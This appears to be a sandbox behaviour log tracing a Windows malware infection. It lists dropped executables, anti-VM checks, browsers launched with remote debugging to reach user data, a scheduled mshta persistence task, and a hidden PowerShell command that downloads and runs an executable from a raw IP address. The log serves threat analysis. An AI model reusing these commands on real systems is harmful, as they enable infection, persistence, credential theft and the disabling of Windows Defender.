C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3376 /prefetch:86⤵PID:3016
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\qqi5x" & exit5⤵
- System Location Discovery: System Language Discovery
PID:5712 -
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1392
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:5508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 9924⤵
- Program crash
PID:2856
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"3⤵
- Executes dropped EXE
PID:5588
-
-
C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1952
-
-
C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1716 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:5268 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:5488 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff926f0cc40,0x7ff926f0cc4c,0x7ff926f0cc586⤵PID:3776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1892 /prefetch:26⤵PID:1552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1736,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2080 /prefetch:36⤵PID:1368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2144,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2160 /prefetch:86⤵PID:1096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3180 /prefetch:16⤵
- Uses browser remote debugging
PID:4980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3224 /prefetch:16⤵
- Uses browser remote debugging
PID:3884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4412,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4532 /prefetch:86⤵PID:1404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4632,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4404 /prefetch:16⤵
- Uses browser remote debugging
PID:4584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4800 /prefetch:86⤵PID:4780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4940,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4824 /prefetch:86⤵PID:4596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4932,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5108 /prefetch:86⤵PID:1408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4784,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5248 /prefetch:16⤵
- Uses browser remote debugging
PID:484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5264,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4200 /prefetch:86⤵PID:5812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5024 /prefetch:86⤵PID:2332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5128,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4836 /prefetch:86⤵PID:3456
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2268 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff926f13cb8,0x7ff926f13cc8,0x7ff926f13cd86⤵PID:3016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1968 /prefetch:26⤵PID:1316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 /prefetch:36⤵PID:2672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:86⤵PID:4348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:16⤵
- Uses browser remote debugging
PID:852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:16⤵
- Uses browser remote debugging
PID:6056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1956 /prefetch:26⤵PID:2948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2756 /prefetch:26⤵PID:3384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2184 /prefetch:26⤵PID:5680
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5680 -s 2887⤵PID:3116
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2176 /prefetch:26⤵PID:3056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2492 /prefetch:26⤵PID:5168
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6036 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9302c3cb8,0x7ff9302c3cc8,0x7ff9302c3cd86⤵PID:4844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:26⤵PID:1560
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1560 -s 2887⤵PID:4780
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:36⤵PID:2392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:86⤵PID:5948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:16⤵
- Uses browser remote debugging
PID:5232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:16⤵
- Uses browser remote debugging
PID:5988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1888 /prefetch:26⤵PID:5272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2228 /prefetch:26⤵PID:2044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3988 /prefetch:26⤵PID:6220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4820 /prefetch:26⤵PID:6304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2316 /prefetch:26⤵PID:6380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4308 /prefetch:16⤵
- Uses browser remote debugging
PID:4760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4328 /prefetch:16⤵
- Uses browser remote debugging
PID:3128
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\sjmgv" & exit5⤵
- System Location Discovery: System Language Discovery
PID:7088 -
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:660
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090366101\c9aa4cecce.exe"C:\Users\Admin\AppData\Local\Temp\1090366101\c9aa4cecce.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3172 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn wnekpmaqpoN /tr "mshta C:\Users\Admin\AppData\Local\Temp\LeHKtr9rh.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:4128 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn wnekpmaqpoN /tr "mshta C:\Users\Admin\AppData\Local\Temp\LeHKtr9rh.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:3776
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\LeHKtr9rh.hta4⤵PID:4432
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3696 -
C:\Users\Admin\AppData\Local\TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE"C:\Users\Admin\AppData\Local\TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1090367021\am_no.cmd" "3⤵PID:4148
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1090367021\am_no.cmd" any_word4⤵PID:4996
-
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵PID:4940
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
